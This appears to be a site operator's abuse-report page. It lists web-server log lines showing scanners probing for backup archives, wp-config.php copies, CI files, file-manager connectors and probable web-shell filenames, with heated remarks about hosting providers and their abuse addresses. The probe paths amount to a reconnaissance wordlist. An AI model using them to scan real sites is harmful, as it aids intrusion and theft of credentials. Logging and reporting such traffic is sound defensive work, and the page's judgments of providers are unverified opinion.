217.15.162.128 website*x.com – – [18/Jul/2025:23:28:31 +0200] „GET /back_up.tar.gz HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /uploads.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /www.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /log.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /views.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /index.php.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /bin.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /images.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:32 +0200] „GET /dist.zip HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:33 +0200] „GET /data.tar.gz HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
217.15.162.128 website*x.com – – [18/Jul/2025:23:28:33 +0200] „GET /s3.tar.gz HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
AS396982 – Google LLC – ALSO GOOGLE AGAIN AND AGAIN! VERY UNSECURE NETWORKS!!!
google-cloud-compliance@google.com
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:51 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:52 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:52 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:52 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:52 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:52 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:53 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:53 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:53 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.107.7 website*x.com – – [19/Jul/2025:03:10:53 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
AS16276 – OVH SAS – OVH ALSO AGAIN AND AGAIN EVERY DAY!!!
abuse@ovh.net
51.89.3.212 website*x.com – – [19/Jul/2025:07:51:53 +0200] „GET /images/images/cache.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.89.3.212 website*x.com – – [19/Jul/2025:07:52:09 +0200] „GET /blog-verify HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

–

MAIL NR. 3 TODAY!
abuse.pt@vodafone.com,abuse@vodafone.com,abuse@snthostings.com,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
AS12353 – Vodafone Portugal – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO ISP WITH HACKER-IDIOTS!
abuse.pt@vodafone.com
89.114.156.172 website*x.com – – [19/Jul/2025:03:36:20 +0200] „GET /uploaded_script.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.114.156.172 website*x.com – – [19/Jul/2025:03:36:23 +0200] „GET /uploaded_script.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
AS16276 – OVH SAS – OVH AGAIN AND AGAIN! OVH IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.89.232.21 website*x.com – – [19/Jul/2025:04:28:17 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
AS40021 – Contabo Inc. – CONTABO AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@contabo.de
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /wp-admin/network/natural.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /natural.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /wp-admin/network/index.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /wp-includes/ID3/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:08 +0200] „GET /wp-includes/bk/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /wp-content/upgrade/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /item.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /wp-content/uploads/2025/04/natural.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /wp-includes/theme-compat/chosen.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:09 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-conflg.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-includes/IXR/chosen.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-includes/js/chosen.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-includes/pomo/wp-conflg.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-admin/js/autoload_classmap.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-includes/certificates/chosen.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /bitrix/admin/htmleditor2/natural.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:10 +0200] „GET /wp-includes/Requests/Auth/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /wp-admin/images/index.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /templates/natural.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /cong.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /wp-content/plugins/apikey/natural.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /wp-admin/js/index.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /wp-includes/style-engine/wp-conflg.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:11 +0200] „GET /wp-includes/ID3/wp-conflg.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:12 +0200] „GET /wp-content/plugins/up/main.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:12 +0200] „GET /repeater.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:12 +0200] „GET /wp-2019.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:12 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:12 +0200] „GET /css.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
94.72.112.3 website*x.com – – [19/Jul/2025:04:33:12 +0200] „GET /log.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36″
… and so on… and so on!!!

–

MAIL NR. 4 TODAY!
terletskydboss@gmail.com, qcloud_net_duty@tencent.com, abuse@vdsina.ru,abuse@datalix.de
4 PROVIDER
AS56380 – “IT FRUIT“ S.R.L. – VERY IGNORANT PROVIDER!!! HACKER-IDIOTS EVERY DAY!!!
terletskydboss@gmail.com
185.153.199.135 website*x.com – – [19/Jul/2025:05:28:51 +0200] „GET /elfinder/connectors/php/connector.php HTTP/1.0“ 403 – „-“ „ALittle Client“
+
185.153.199.135 website*x.com – – [20/Jul/2025:09:56:17 +0200] „GET /elfinder/src/connectors/php/connector.php HTTP/1.0“ 403 – „-“ „ALittle Client“
AS132203 – Tencent Building, Kejizhongyi Avenue – TENCENT IS COMPLETE BLOCKED, COMPLETE UNWANTED! VERY IGNORANT, VERY UNSECURE!!!
ALSO THIS REFERRER-SPAM IS COMING EVERY DAY!!!
qcloud_net_duty@tencent.com
43.167.232.38 www.website*x.com – – [19/Jul/2025:05:28:51 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“
AS216071 – SERVERS TECH FZCO – VDSINA IS COMPLETE UNWANTED, COMPLETE BLOCKED! RUSSIA ALSO COMPLETE UNWANTED, COMPLETE BLOCKED!
ALSO THIS REFERRER-SPAM IS COMING EVERY DAY!!!
abuse@vdsina.ru
212.118.43.65 www.website*x.com – – [19/Jul/2025:07:20:31 +0200] „GET / HTTP/1.0“ 403 – „https://GBNADVISORS.COM“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36“
AS58087 – Florian Kolb – THIS IS NOT THE FIRST ABUSE-MAIL! STOP THIS HACKER-IDIOTS IN YOUR NETWORKS NOW!!!
abuse@datalix.de
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:51 +0200] „GET /wp-config.php_hlt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:51 +0200] „GET /wp-config.php.tpl HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:51 +0200] „GET /wp-config.php.mlehr.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:52 +0200] „GET /wp-config.php_old2 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:52 +0200] „GET /wp-config.php_OLD_BK HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:52 +0200] „GET /wp-config.php_antigo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:53 +0200] „GET /.wp-config.php.swo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:53 +0200] „GET /.wp-config.php.swp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:53 +0200] „GET /wp-config.phpoldd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
45.133.74.53 website*x.com – – [19/Jul/2025:11:11:54 +0200] „GET /wp-config.php.old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36″

–

MAIL NR. 5 TODAY!
terletskydboss@gmail.com,bucklog@proton.me,abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com
AS56380 – “IT FRUIT“ S.R.L. – VERY IGNORANT PROVIDER!!! HACKER-IDIOTS EVERY DAY!!!
terletskydboss@gmail.com
185.153.199.135 website*x.com – – [19/Jul/2025:06:28:16 +0200] „GET /elfinder/connectors/php/connector.php HTTP/1.0“ 403 – „-“ „ALittle Client“
AS211590 – Bucklog SARL – BUCKLOG AGAIN AND AGAIN! NO ANSWER,NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
bucklog@proton.me
185.177.72.44 website*x.com – – [19/Jul/2025:09:46:10 +0200] „GET /.gitlab-ci.yml HTTP/1.0“ 403 – „-“ „fasthttp“
AS8075 – Microsoft Corporation – MICROSOFT ALSO AGAIN AND AGAIN! VERY UNSECURE!!!
abuse@microsoft.com
20.186.178.10 website*x.com – – [19/Jul/2025:10:08:59 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

–

MAIL NR. 6 TODAY!
abuse@nybula.com, abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com,google-cloud-compliance@google.com, network-abuse@google.com
AS401116 – Nybula LLC IS COMPLETE BLOCKED, COMPLETE UNWANTED! VERY IGNORANT, VERY UNSECURE!!!
ALSO THIS REFERRER-SPAM IST COMING EVERY DAY!!!
abuse@nybula.com
196.251.66.28 website*x.com – – [19/Jul/2025:06:35:58 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“
AS8075 – Microsoft Corporation IS ALSO COMPLETE BLOCKED, COMPLETE UNWANTED! VERY IGNORANT, VERY UNSECURE!!!
abuse@microsoft.com
68.218.118.71 website*x.com – – [19/Jul/2025:06:52:56 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
68.218.118.71 website*x.com – – [19/Jul/2025:06:52:57 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
68.218.118.71 website*x.com – – [19/Jul/2025:06:53:12 +0200] „GET /moon.php HTTP/1.0“ 403 – „-“ „-“
68.218.118.71 website*x.com – – [19/Jul/2025:06:53:12 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
68.218.118.71 website*x.com – – [19/Jul/2025:06:53:27 +0200] „GET /radio.php HTTP/1.0“ 302 – „-“ „-“
68.218.118.71 website*x.com – – [19/Jul/2025:06:53:42 +0200] „GET /log.php HTTP/1.0“ 302 – „-“ „-“
